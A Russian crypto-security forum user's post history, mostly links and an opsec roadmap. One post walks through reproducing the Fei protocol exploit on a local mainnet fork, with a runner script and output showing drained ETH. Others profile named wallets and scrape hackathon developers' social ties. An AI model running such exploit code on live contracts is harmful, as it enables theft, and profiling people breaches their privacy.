Перейти к публикации

Officer_CIA

Members
  • Публикации

    33
  • Зарегистрирован

  • Посещение

  • Дней в лидерах

    11

Все публикации пользователя Officer_CIA

  1. Officer_CIA

    4read/4watch

    Привет всем, сделал подборку материалов по смарт-контракт аудитам и хакингу на русском telegra.ph/Smart-kontrakt-auditor---projdem-ehtot-nelegkij-put-vmeste-05-07 надеюсь, будет полезно кому-нибудь. Больше на моем канале https://t.me/officer_cia Больше данных по аудитам и хакингу: t.me/officer_cia/177 (чеклисты) t.me/officer_cia/278 (ресурсы)
  2. Officer_CIA

    Solana

    Ответ на этот комментарий: https://cp0x.com/topic/385-solana/?do=findComment&comment=12023
  3. Officer_CIA

    Solana

    Еще парочка интересных инструментов для получениях ценных данных с твиттера: http://spoonbill.io https://analyticsindiamag.com/complete-tutorial-on-twint-twitter-scraping-without-twitters-api https://github.com/taspinar/twitterscraper www.brandwatch.com
  4. Судя по поступившим данным, материнская компания АМЛбот - https://crystalblockchain.com/ продала МВД РФ систему мониторинга Crystal Expert - https://crystalblockchain.com/crystal-expert/ Источник: https://zakupki.gov.ru/epz/order/notice/ea44/view/supplier-results.html?regNumber=0373100124921000068 Вывод: Система работает хорошо, что не раз уже было подтверждено на практике в реальных кейсах, надеюсь, этот шаг станет шагом к защите крипто-иннвесторов, инициированию расследований уголовных дел о краже монет у крипто-инвесторов, а не к "ковровой бомбардировке" всех причастных к криптовалютам. Пользуясь случаем, рекомендую хорошую статью про работу расследователя в AMLбот: На Английском https://medium.com/@mrdog/amlbot-determine-the-purity-of-cryptoassets-and-the-origin-of-coins-fca22fb99d02 На Русском https://telegra.ph/AML-Bot-opredelyaem-chistotu-kriptoaktivov-i-proishozhdenie-monet-12-27
  5. Officer_CIA

    Solana

    Ход мыслей был такой: установить все ранние хакатоны Соланы, потом поднять их старые чаты, переписки и, как в примере выше - списки участников на Airtable. После этого без труда узнал твиттеры и тд.
  6. Officer_CIA

    Solana

    @radnek Я нашел в твиттере всех разработчиков, принимавших участие в хакатонах Соланы - например, https://airtable.com/shrQvOZRiXN0YfO5U/tblnrOhKW8m8WF9d3 и потом через https://github.com/twintproject/twint устанавливаю их связи. Более или менее работает при поиске интересных проектов. Делал это задание давно для одного фонда, им понравилось.
  7. Нет, это, скорее, мини-пост, основанный на твите https://twitter.com/0xKeno/status/1429438133603536904?s=20, в статье же https://officercia.medium.com/tenderly-app-a-swiss-pocketknife-for-the-web3-developer-89bb904bee46 я описал больше вариантов использования Тендерли
  8. В пунктах 1-10 базовая, 10-25 корпоративная. Постараюсь разделить их в новой редакции, забыл указать
  9. Добавляем инфы: https://twitter.com/_anishagnihotri/status/1454090701227143176?t=A0gRYRyHX9lzUYrfaW9eNQ&s=19 https://twitter.com/jurad0x/status/1454120956516093956?t=pyRWfKZYgOqKmIKorycMuQ&s=19 https://www.privacytools.io/ https://anonymousplanet.org/guide.html https://www.usenix.org/system/files/1401_08-12_mickens.pdf
  10. Привет всем! Я составил 25-шаговый роадмап по личной безопасности. Буду признателен фидбэку:3 https://github.com/OffcierCia/Crypto-OpSec-SelfGuard-RoadMap Перевод на Русский: Проблема 1 Безопасный почтовый провайдер, например, protonmail или tutanota. Используйте надежный VPN, например Mullvad или ProtonVPN. Смотреть больше --- Проблема 2 Разные электронные почты / разные надежные пароли. Храните их в одном месте. Никогда не используйте повторяющиеся пароли, особенно для аккаунтов с персонально идентифицируемой и конфиденциальной информацией (например, Facebook, Gmail, AppleID, Twitter, банки/платежи, криптовалютные счета). Используйте пароли, которые генерируются случайным образом и состоят из 20+ символов. Если вы заметили подозрительную активность с паролями или неудачные входы в любой из ваших аккаунтов, смените все пароли, начиная с чувствительных и авторизационных аккаунтов, таких как основная электронная почта и банковские/криптовалютные аккаунты. Хорошими вариантами являются 1Password и LastPass. Читать далее --- Проблема 3 Никогда не связывайте номера телефонов с криптоплатформами. Используйте E-SIM симки, если вам необходимо привязать телефон. Чтобы заблокировать свою SIM, свяжитесь с оператором мобильной связи. Попросите их НИКОГДА не вносить изменения в ваш номер телефона/SIM, если вы физически не явитесь в определенный магазин с минимум двумя документами, удостоверяющими личность. Это (должно) помешать хакерам звонить в AT&T, T-Mobile или Vodafone, выдавать себя за вас и просить перенести ваш номер телефона на новый телефон. Работает также с Российскими операторами такими как МТС, Билайн, Мегафон, Теле2, Йота и тд. Читать далее --- Проблема 4 Вместо 2FA на основе SMS используйте Google Authenticator (iOS/Android) или приложения Authy для iOS или Android. Google Authenticator быстрее и проще в настройке, но Authy предлагает более надежные возможности восстановления учетной записи. Имейте в виду, что коды, генерируемые приложениями 2FA, зависят от конкретного устройства. Ваша учетная запись не сохраняется в облаке Google или iCloud, поэтому если вы потеряете телефон, вам придется потратить некоторое время на подтверждение своей личности, чтобы восстановить 2FA. Дополнительная безопасность стоит этих хлопот! Подробнее --- Проблема 5 Холодное хранение и отдельный "горячий" кошелек. Используйте multisig (например, gnosis-safe) или хотя бы аппаратный кошелек. Никогда не храните свою сид фразу в цифровом виде. Сид фразы должны храниться на бумажных карточках, входящих в комплект аппаратных кошельков! Это означает, никогда не печатайте ее, не храните ее в Интернете и не фотографируйте ее. Читать далее --- Проблема 6 Автономные резервные копии. Храните их в сейфе. Подробнее --- Проблема 7 Никогда не делайте того, чего не понимаете. Всегда проверяйте, какой токен вы аппрувите, какую транзакцию подписываете, какие активы отправляете и т.д. - будьте предельно точны при совершении любой финансовой операции. Помните, что один из возможных векторов атаки - поставить вас в ситуацию, которая побудит вас сделать что-либо (войти в систему или что-то в этом роде). Читать далее --- Проблема 8 Будьте осторожны, используя свой реальный домашний адрес в Интернете для целей доставки. Утечки данных стали ежедневным явлением, и многие утечки включают имена и адреса клиентов. Ваш физический адрес не так легко изменить, как номер телефона или адрес электронной почты, поэтому будьте особенно внимательны к тому, где вы используете его в Интернете. Если вы заказываете пиццу с помощью криптовалюты, закажите ее с доставкой. При совершении покупок в Интернете используйте другой (общедоступный) адрес для доставки посылок. В качестве вариантов здесь можно использовать место работы или ящики-дропбоксы в таких службах доставки, как FedEx и местная почтовая служба. Читать далее --- Проблема 9 Помните: вы можете стать мишенью Мы являемся естественной мишенью для всевозможных атак - от обычных киберпреступников до конкурентного шпионажа (звучит драматично, но это реальность!). При этом не имеет значения, в какой отрасли вы работаете. Если у вас есть какая-либо конфиденциальная, закрытая информация (а давайте посмотрим правде в глаза, большинство людей, занимающихся криптовалютами, имеют такую информацию), то вы вполне можете стать мишенью. Это хорошая вещь, о которой всегда нужно помнить. Подробнее Подробнее --- Проблема 10 Сохраняйте бдительность - Создайте культуру скептицизма, в которой сотрудники и друзья будут чувствовать себя комфортно, проверяя дважды, прежде чем нажать на ссылку или ответить на запрос о предоставлении конфиденциальной информации, и вы получите гораздо более безопасную организацию в целом. Подробнее Подробнее --- Проблема 11 OpSec часто используется в общественных местах. Например, если члены вашей команды обсуждают рабочие вопросы в ближайшем кафе за обедом, во время конференции или за кружкой пива, есть вероятность, что кто-то может подслушать. Как говорится, свободные губы могут потопить корабль, поэтому убедитесь, что вы не обсуждаете конфиденциальную информацию компании, находясь на публике. Многих ошибок OpSec можно избежать, если быть более осведомленным о своем окружении и контексте, в котором вы говорите: что вы говорите, где вы находитесь, с кем вы говорите и кто может вас подслушать. Неплохо было бы рассказать о правилах "нет-нет" для вашей конкретной компании во время вводного инструктажа и периодически напоминать о них сотрудникам. Смотреть подробнее --- Проблема 12 Определите свои конфиденциальные данные, включая исследования, интеллектуальную собственность, финансовую отчетность, информацию о клиентах и сотрудниках. Это те данные, на защите которых вам нужно будет сосредоточить свои ресурсы. Смотреть подробнее --- Проблема 13 Определите возможные угрозы. Для каждой категории информации, которую вы считаете конфиденциальной, вы должны определить, какие виды угроз существуют. Хотя вам следует опасаться третьих лиц, пытающихся украсть вашу информацию, вам также следует остерегаться внутренних угроз, таких как нерадивые сотрудники и недовольные работники. Читать далее --- Проблема 14 Проанализируйте дыры в системе безопасности и другие уязвимости. Оцените текущие средства защиты и определите, какие существуют лазейки или слабые места, если таковые имеются, которые могут быть использованы для получения доступа к вашим конфиденциальным данным. Подробнее --- Проблема 15 Оцените уровень риска, связанный с каждой уязвимостью. Проранжируйте уязвимости, используя такие факторы, как вероятность осуществления атаки, степень ущерба, который вы понесете, и количество работы и времени, которое вам потребуется для восстановления. Чем выше вероятность и ущерб от атаки, тем большее внимание следует уделять снижению связанного с ней риска. Подробнее --- Проблема 16 Принятие контрмер. Последний шаг операционной безопасности заключается в создании и реализации плана по устранению угроз и снижению рисков. Это может включать обновление оборудования, создание новых политик в отношении конфиденциальных данных или обучение сотрудников рациональным методам обеспечения безопасности и политикам компании. Меры противодействия должны быть простыми и понятными. Сотрудники должны быть в состоянии выполнить необходимые меры с их стороны с дополнительным обучением или без него. Читать далее --- Проблема 17 Внедрите двойной контроль. Убедитесь, что те, кто работает в вашей сети, не являются теми же людьми, которые отвечают за безопасность. Подробнее --- Проблема 18 Автоматизируйте задачи, чтобы уменьшить необходимость вмешательства человека. Люди являются самым слабым звеном в инициативах операционной безопасности любой организации, потому что они совершают ошибки, упускают детали, забывают и обходят процессы. Подробнее Подробнее --- Проблема 19 Реагирование на инциденты и планирование аварийного восстановления всегда являются важнейшими компонентами надежной системы безопасности. Даже если операционные меры безопасности надежны, у вас должен быть план по выявлению рисков, реагированию на них и смягчению потенциального ущерба. Подробнее Подробнее --- Проблема 20 Управление рисками подразумевает способность выявлять угрозы и уязвимости до того, как они превратятся в проблемы. Операционная безопасность заставляет менеджеров глубоко погружаться в свою деятельность и выяснять, где информация может быть легко нарушена. Взгляд на операции с точки зрения злоумышленника позволяет менеджерам обнаружить уязвимые места, которые они могли бы не заметить, и принять необходимые контрмеры для защиты конфиденциальных данных. Самое главное здесь - условно понять процесс атаки. Их вектор. В качестве примера: хакер поставил вам на компьютер некий RAT (троян удаленного доступа), и теперь у хакера есть два пути. Если взлом "веерный", т.е. массовый, то хакер украдет ваши cookies, и другую информацию, чтобы потом эти данные продать на вторичном рынке для обработки этих логов ламерами. От этого должна помочь классическая opsec, упомянутая в 1-10. Или второй вариант - прямая атака, при которой хакер сделает фишинговую страницу на вашем роутере, через которую вы введете свой пароль (отравление DNS-сервера). То есть, чтобы предотвратить атаку, в идеале нужно разделять машины и сети. Также следует проверять сертификаты. Хакер также может совершить атаку на буфер обмена, когда вы скопируете адрес отправки и он изменится на адрес хакера. Причем начало и конец будут совпадать с оригинальным адресом, что будет представлять собой смесь векторов атаки - вектор социальной инженерии, фишинг и классическое вредоносное ПО. Смотреть подробнее Читать далее --- Проблема 21 Уровень безопасности обычно зависит от вашей модели угроз и от того, какому противнику вы противостоите. Поэтому трудно определить, насколько хороша ваша система защиты. Но я бы сказал, что он звучит довольно хорошо. Рекомендую посмотреть: Смотреть больше Смотреть больше --- Проблема 22 Если вы пользуетесь смартфоном, будьте предельно внимательны. Подробнее --- Проблема 23 Взаимодействуйте только с протоколами DeFi, которым вы доверяете - Потратьте время на то, чтобы ознакомиться с некоторыми предыдущими понятиями, которые мы рассматривали, такими как стакинг, фарминг, NFT, и изучите любые другие новые термины, с которыми вы можете столкнуться, прежде чем вкладывать криптовалюту в DApp, который использует любую из этих стратегий. Подробнее Читать далее --- Проблема 24 Используйте надежные сервисы. Использование безопасного, простого в использовании криптокошелька для взаимодействия с приложениями DeFi является необходимым условием безопасной и удобной работы с DeFi. Взаимодействие со смарт-контрактами может быть сложным для начинающих пользователей, поэтому использование удобного для новичков криптокошелька с поддержкой DApp является разумным способом снижения рисков, возникающих из-за случайных ошибок со стороны пользователя. Подробнее Подробнее --- Проблема 25 Будьте в курсе наиболее распространенных атак. Следите за сайтами хакеров, последними стандартами безопасности, узнайте, что и зачем делают Nitrokey и Yubikey. В заключение - прочитайте, что такое OSINT и counterOSINT, чтобы возможные преступники не смогли собрать нужные данные. Читать далее Подробнее Спасибо за внимание!
  11. В скором времени напишу более подробную статью с опытом по использованию сей тулзы. Пока что ощущения очень хорошие - удобно.
  12. Доброго времени суток всем форумчанам! Итак, в инструкции всего три шага: 1 - Вы можете легко создать форк mainnet с помощью Tenderly.co . Выполните регистрацию на сайте. 2 - Затем добавьте эту выделенную часть в качестве конечной точки rpc 3 - И, наконец, получаем визуальный трейсинг симулированной транзакции супер-легко! Вдохновлено этим тредом: https://twitter.com/0xKeno/status/1429438133603536904?s=20
  13. The Graph Protocol объявил о самом большом баг-баунти в истории: https://medium.com/immunefi/the-graph-joins-immunefi-with-the-worlds-largest-ug-bounty-in-history-2-5-million-d63a466f7485
  14. Можно сделать следующие выводы - хакер пользовался CEX, а человек, которому он задонатил 13 37 ETH перевел часть в Рект ньюс, часть на Бинанс, где по его же словам в (чате Rekt News в телеграм) ему заморозили аккаунт и потребовали скинуть версию устройства, OS и пройти строгое KYC.
  15. Проверка адреса (0xC8a65Fadf0e0dDAf421F28FEAb69Bf6E2E589963) вчерашнего хакера Поли Нетворк:
  16. Доброго времени суток, дорогие читатели! Сегодня я бы хотел рассказать про возможности для DeFi-пентестера. Это руководство, написанное белым хакером Lucash-dev для Immunefi, поможет вам настроить и воспроизвести эксплойт протокола Fei, а также - научиться чему-то новому! К концу этого руководства вы сможете: Создать простой проект HardHat Скомпилировать код смарт-контракта PoC Создать локальный форк сети Ethereum mainnet Запустить скрипт, который развернет и выполнит контракт PoC. И этот пост должен научить вас: Как тестировать собственные эксплойты против основной сети Что взлом контрактов Ethereum не так уж сложен. Прежде чем приступить к работе, давайте убедимся, что в вашей системе установлено следующее: node.js npm yarn Установить их в Ubuntu очень просто: sudo apt update sudo apt install nodejs npm sudo npm install --global yarn HardHat - Фреймворк HardHat - это фреймворк для разработки, тестирования и развертывания смарт-контрактов Ethereum. Он облегчит нам жизнь, позволяя легко запускать локальный форк сети Ethereum, чтобы не проводить тесты на реальном мейннете (дорого и опасно!). Он также предоставляет библиотеки и утилиты для автоматизации скриптов, выполняющих все задачи для наших тестов. Чтобы создать пустой проект HardHat: mkdir fei-poc cd fei-poc yarn add hardhat npx hardhat init Если HardHat предложит вам ответить, вы должны выбрать "create a sample project", а затем ответить "yes" на все остальные вопросы. Вы должны увидеть файл hardhat.config.js, который выглядит следующим образом: require("@nomiclabs/hardhat-waffle"); task("accounts", "...", async () => { ... }); module.exports = { solidity: "0.7.3", }; Вы также должны увидеть файл contracts/Greeter.sol и scripts/sample-scripts.js. Это образец смарт-контракта и образец скрипта. Чтобы проверить, все ли работает как надо, вы можете запустить: npx hardhat run scripts/sample-script.js В консоли должно появиться сообщение типа Greeter deployed to: 0x... Что только что сделала команда выше: Скомпилировала образец контракта Запустила локальный узел сети Ethereum (пустой). Развернула образец контракта на нем. Если на этом этапе вы видите какие-либо сообщения об ошибках, скорее всего, что-то не так, и вам следует устранить неполадки. Компиляция кода PoC. Теперь, когда у нас есть проект HardHat, давайте скопируем в него код эксплойта PoC, чтобы его можно было скомпилировать и развернуть локально. Сначала возьмите два файла для эксплойта и скопируйте их в каталог contracts вашего проекта. Allocator.sol Exploit.sol Теперь компиляция должна быть такой же простой, как и запуск: npx hardhat compile Вот только это пока не сработает! Если вы попробуете выполнить приведенную выше команду, то все, что вы увидите, это сообщение об ошибке - импортированный файл не найден. Причина в том, что нам не хватает кода для интерфейсов контрактов, с которыми взаимодействует код PoC. Наша жизнь была бы намного проще, если бы хакер, создавший PoC, предоставил полный проект, который мы могли бы просто собрать локально, но он этого не сделал. Когда вы взламываете развернутые контракты, такое часто случается. Для PoC Fei большинство интерфейсов можно легко найти в ГитХабе Fei, но так будет не всегда. В крайнем случае, вы всегда можете поискать код контракта в Etherscan, если вы знаете адрес контракта. Иногда там есть готовый код интерфейса. В других случаях можно найти хотя бы ABI. Один простой трюк для получения интерфейсов, даже если у вас нет исходного кода контрактов, заключается в том, чтобы найти ABI для контракта в Etherscan и затем использовать инструмент для создания кода интерфейса Solidity для него. Хотя этот трюк хорош, он не всегда работает. Например, у инструмента возникают проблемы со сложными типами (struct). Однако для данного контракта PoC вы должны быть в состоянии легко найти все интерфейсы между кодовой базой Fei и следующими ресурсами: https://github.com/Uniswap/uniswap-v2-core/tree/master/contracts https://github.com/Uniswap/uniswap-v2-periphery/tree/master/contracts https://github.com/aave/flashloan-box/tree/master/contracts/aave Добавьте каждый из них в свой собственный файл ".sol", сопоставив имена файлов в утверждениях "import" в коде PoC. Как только вы это сделаете, компиляция должна заработать: npx hardhat compile Форкаем мейннет Для тестирования кода PoC мы создадим локальный форк сети Ethereum mainnet. Это очень мощный инструмент, который HardHat (ну, на самом деле ganache за кулисами) использует для тестирования. Мы можем в точности имитировать то, что произойдет при реальной атаке, не затрагивая реальное состояние сети и не тратя огромные деньги на оплату транзакций. Это также позволит нам имитировать блокчейн в любой момент прошлого, поскольку мы можем выбрать номер блока для начала форка, и позволит нам выдать себя за любую учетную запись для тестирования (имитируя атаки привилегированных пользователей, например, или китов). Для этого вам нужно будет зарегистрировать аккаунт в Alchemy (есть и другие способы сделать это без их услуг, но они непрактичны). Перед форком блокчейна вам необходимо зарегистрироваться для использования API Alchemy по адресу: https://auth.alchemyapi.io/signup. Бесплатного аккаунта, вероятно, будет достаточно для всех ваших нужд. Как только вы завершите регистрацию, вам нужно будет добавить "приложение" в свою панель управления. Вы можете назвать его "test". После создания приложения вы сможете найти URL API с вашим секретным ключом. Он должен выглядеть следующим образом: https://eth-mainnet.alchemyapi.io/v2/k1asdfa2fasdfa-asdf_asdf Теперь, когда у вас есть URL Alchemy API, добавьте конфигурацию для форка mainnet в файл hardhat.config.js (в корневой каталог проекта). module.exports = { defaultNetwork: 'hardhat', networks: { hardhat: { forking: { // Replace with your actual API URL url: "https://eth-mainnet.alchemyapi.io/v2/k1asdfa2fasdfa-asdf_asdf" } } }, solidity: "0.7.3" } Вы можете запустить пример скрипта в своем локальном форке. npx hardhat run scripts/sample-script.js Чтобы повторить атаку на Fei, вы можете использовать приведенный ниже скрипт: const hre = require("hardhat"); async function main() { // We reset the local chain to a fork of mainnet // so that the state is always pristine. await hre.network.provider.request({ method: "hardhat_reset", params: [{ forking: { // Replace with your actual API URL jsonRpcUrl: "https://eth-mainnet.alchemyapi.io/v2/asdfasdfasdfasdf" //,blockNumbeR: 12500000 // after fix ,blockNumber: 12350000 // before fix } }] }) // We'll use this contract to check the WETH balance of the // PoC contract. const WETH = await hre.ethers.getContractAt("IERC20",'0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2'); // Deploy the PoC contract. const Exploit = await hre.ethers.getContractFactory("Exploit"); const exploit = await Exploit.deploy(); console.log("Exploit deployed to:", exploit.address); // Let's run the exploit PoC! const balance0 = await WETH.balanceOf(exploit.address); console.log("Balance before exploit",balance0/1e18,"ETH"); console.log("starting exploit"); // I had a bit of trouble finding the optimal values using the // the Python script, values didn't seem to work. // Found these parameters by trial and error. d = "207569000000000000000000" b = "092430000000000000000000" await exploit.start(d, b); const balance1 = await WETH.balanceOf(exploit.address); console.log("If the balance is positive the exploit worked!"); console.log("Balance after exploit",balance1/1e18,"ETH"); } main() .then(() => process.exit(0)) .catch(error => { console.error(error); process.exit(1); }); Если следовать комментариям, должно быть понятно, что делает каждая команда. Самая важная деталь, на которую следует обратить внимание, заключается в том, что мы будем использовать форк mainnet на определенном блоке до того, как уязвимость была исправлена. Сохраните его как fei.js и запустите с помощью команды: npx hardhat run scripts/fei.js Вы должны увидеть несколько отладочных сообщений и что-то вроде этого в конце вывода: If the balance is positive the exploit worked! Balance after exploit 9635.065665081976 ETH Мои поздравления! Но мы еще не закончили на 100%. Что если кто-то действительно осуществит эту атаку в реальном мире? Мы можем проверить, что проблема была устранена, попытавшись воспроизвести атаку, но используя форк основной сети в блоке после устранения уязвимости. // We reset the local chain to a fork of mainnet // so that the state is always pristine. await hre.network.provider.request({ method: "hardhat_reset", params: [{ forking: { // Replace with your actual API URL jsonRpcUrl: "https://eth-mainnet.alchemyapi.io/v2/asdfasdfasdfasdf" blockNumbeR: 12500000 // after fix //,blockNumber: 12350000 // before fix } }] }) Теперь вам следует попробовать изменить тестовый скрипт и PoC-контракт, указав на другие контракты мейннета, возможно, в других проектах, и понаблюдать за результатами... Рекомендуется к прочтению: Flash Crash for Cash: Cyber Threats in Decentralized Finance by Kris Oosthoek   Инструменты: Визуализация потока управления Solidity: https://github.com/raineorshine/solgraph Инструмент символьного исполнения смарт-контрактов: https://github.com/trailofbits/manticore Фреймворк статического анализа Solidity: https://github.com/crytic/slither Расширение статического анализа SECBIT для компилятора Solidity: https://github.com/sec-bit/adelaide Модульный верификатор для смарт-контрактов Solidity: https://github.com/SRI-CSL/solidity Уязвимые токены ERC20: https://github.com/sec-bit/awesome-buggy-erc20-tokens Визуальный анализатор архитектуры Solidity: https://piet.slock.it/ Профилировщик функций Solidity: https://github.com/EricR/sol-function-profiler Альтернативный дизассемблер EVM: https://github.com/Arachnid/evmdis Фреймворк для тестирования Solidity с горячей загрузкой: https://github.com/hillstreetlabs/espresso Плагин для тестирования смарт-контрактов: https://github.com/cobraframework/pytest-cobra
  17. У сервиса из статьи кстати есть бот @cryptoaml_bot, с помощью отдела Рисерча проводился анализ. Выше я скинул транзакции которые найдены «руками» через Мальтегу.
  18. https://etherscan.io/tx/0x95b2b7872c79b094c36e63dd2349aa8228ba862992172f37cb9700bc69b5fcad https://etherscan.io/tx/0x9499daf5cfe369f7a7d112ed98f849589fe6316e443e5f32d800e0a2cb365f3f
  19. Также рекомендую прочитать эту статью о криминалистике в Ethereum : https://www.smartcontractresearch.org/t/research-summary-blockchain-is-watching-you-profiling-and-deanonymizing-ethereum-users/564 Собрал максимальное количество визуализаторов транзакций/скоринговых сервисов тут: https://github.com/OffcierCia/DeFi-Developer-Road-Map#transaction-visualization-scoring--tracking
  20. Меня часто спрашивают о криминалистике и отслеживании транзакций. Ответ заключается в том, что я предпочитаю метод кластеризации, и сейчас я покажу вам, как он работает. 1 - Возьмем кошелек из этой статьи - он принадлежит SilkRoad. https://www.coindesk.com/nearly-1b-in-bitcoin-moves-from-wallet-linked-to-silk-road 1HQ3Go3ggs8pFnXuHVHRytPCq5fGG8Hbhx Предыдущие проекты пытались деанонимизировать биткоин, используя трафик сети P2P и выясняя IP-адрес каждого владельца биткоин-адреса. Однако этот метод позволял получить лишь небольшое количество достоверных сопоставлений между адресом биткоина и IP-адресом его владельца. Чтобы улучшить этот метод, AML-компании добавили процесс кластеризации адресов BTC/ETH(ERC20), который показывает лучшие результаты и выявляет неочевидные пересечения. 2 - Затем я провожу анализ кластеров через amlbot.com - довольно простой инструмент для работы. Исследование выявило 26 связей с 25 кластерами, где 15 прямых связей и 11 косвенных. Посмотреть полную карту: https://web.amlbot.com/aml/response/5EC6CA4DDB26177/24115520210717232725:DF8CD80B1254031 Расследование показывает названия кластеров, их риски и количество промежуточных адресов (расстояние до этих кластеров). 3 - Мой отчет доказывает, что владелец кошелька получал биктоины от SilkRoad и, вероятно, получал деньги от ведущих бирж, однажды потеряв свои биткоины во время скандального закрытия BTC-E. Доказательство отчета: ID:24116220210717234420:E1DE144F5E58DFB Time: 2021-07-17T20:44:20+00:00 Генерация отчета Высота блока: 691470 Ссылка: 24116220210717234420:E1DE144F5E58DFB А теперь я предлагаю немного пошалить и проверить один из кошельков Виталика Буторина: 0x1db3439a222c519ab44bb1144fc28167b4fa6ee6 Исследование выявило 389 связей с 353 кластерами, где 40 прямых связей, а 349 косвенных. Для просмотра полной таблицы связей перейдите по ссылке: https://web.amlbot.com/aml/response/5EC6CA4DDB26177/24246220210719235725:9ECAF3C1E071AF2 Возможно, Торнадо или кто-то из хакеров подарил Виталику 15 Эфир. Либо он сам пополнил свой счет.)
  21. Карта получила обновление, а также переводы на 2 языка, спасибо! Любимый раздел: https://github.com/OffcierCia/ultimate-defi-research-base#security--safety Хороший сборник инcтрументов: https://github.com/OffcierCia/DeFi-Developer-Road-Map#tools-collection(изменено)
  22. Доброго времени суток! Представляю на ваш суд карту разработчика DeFi, а также первую Базу научных исследований! В случае нахождения какой-либо неточности, пожалуйста, откройте PR или Issue -добавим/удалим информацию Навигация: Basics - https://github.com/OffcierCia/DeFi-Developer-Road-Map#basics dApps - https://github.com/OffcierCia/DeFi-Developer-Road-Map#dapps Frameworks - https://github.com/OffcierCia/DeFi-Developer-Road-Map#frameworks zk-snarks - https://github.com/OffcierCia/DeFi-Developer-Road-Map#zk-snarks Further Readings - https://github.com/OffcierCia/DeFi-Developer-Road-Map#further-readings Security - https://github.com/OffcierCia/DeFi-Developer-Road-Map#security--safety DeFi - https://github.com/OffcierCia/DeFi-Developer-Road-Map#defi ENS - https://github.com/OffcierCia/DeFi-Developer-Road-Map#ethereum-name-service NFT - https://github.com/OffcierCia/DeFi-Developer-Road-Map#non-fungible-token-nft Stable Coins - https://github.com/OffcierCia/DeFi-Developer-Road-Map#stable-coins General Info - https://github.com/OffcierCia/DeFi-Developer-Road-Map#ethereum-tools Tools Collection - https://github.com/OffcierCia/DeFi-Developer-Road-Map#tools-collection ETH 2.0 - https://github.com/OffcierCia/DeFi-Developer-Road-Map#ethereum-20 Front End - https://github.com/OffcierCia/DeFi-Developer-Road-Map#front-end Карта: https://github.com/OffcierCia/DeFi-Developer-Road-Map База: https://github.com/OffcierCia/ultimate-defi-research-base
×
×
  • Создать...